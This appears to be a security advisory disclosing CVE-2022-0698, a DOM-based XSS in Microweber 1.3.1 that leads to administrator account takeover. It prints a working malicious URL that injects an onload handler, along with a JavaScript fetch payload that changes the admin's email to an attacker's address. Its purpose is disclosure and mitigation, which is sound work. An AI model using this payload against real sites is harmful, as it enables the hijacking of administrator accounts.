Microweber 1.3.1 - DOM XSS to Account Takeover

Summary

Vulnerability

Description

Microweber version 1.3.1 allows an unauthenticated user to perform an account takeover via an XSS on the 'select-file' parameter. The following is an example of a vulnerable URL:

• http://example.com/admin/view:modules/load_module:files#select-file=http://example.com/userfiles/media/default/ovaa-checklist.txt.

Vulnerability

The XSS present in Microweber 1.3.1 allows an unauthenticated remote attacker to perform an Account Takeover. To trigger this vulnerability, we will need to send the following malicious link to an administrator in order to hack their account. The following is an example of a malicious URL:

• http://example.com/admin/view:modules/load_module:files#select-file=http://example.com/userfiles/media/default/ovaa-checklist.php%22onload%3d%22javascript:PAYLOAD%22+///.txt

In the PAYLOAD field we will put the following malicious JS code:

fetch('http://example.com/api/user/1',{
    method:'POST',
    credentials:'include',
    headers:{
        'Content-type':'application/x-www-form-urlencoded;charset%3dUTF-8'
    },
    body:'id%3d1%26_method%3dPATCH%26username%3dadmin%26email%3dattacker%40fluidattacks.com%26phone%3d\r\n'
})

Exploitation

To exploit this vulnerability, a malicious URL must be sent to the administrator of the Microweber instance. Once the administrator enters the link, we will change the email address associated with their account to one that is under our control.

Our security policy

We have reserved the CVE-2022-0698 to refer to this issue from now on.

• https://fluidattacks.com/advisories/policy/

System Information

• Version: Microweber 1.3.1

• Operating System: GNU/Linux

• Web Server: Apache

• PHP Version: 8.1.9

• Database and version: MySQL

Mitigation

An updated version of Microweber is available at the vendor page.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/microweber/microweber

Timeline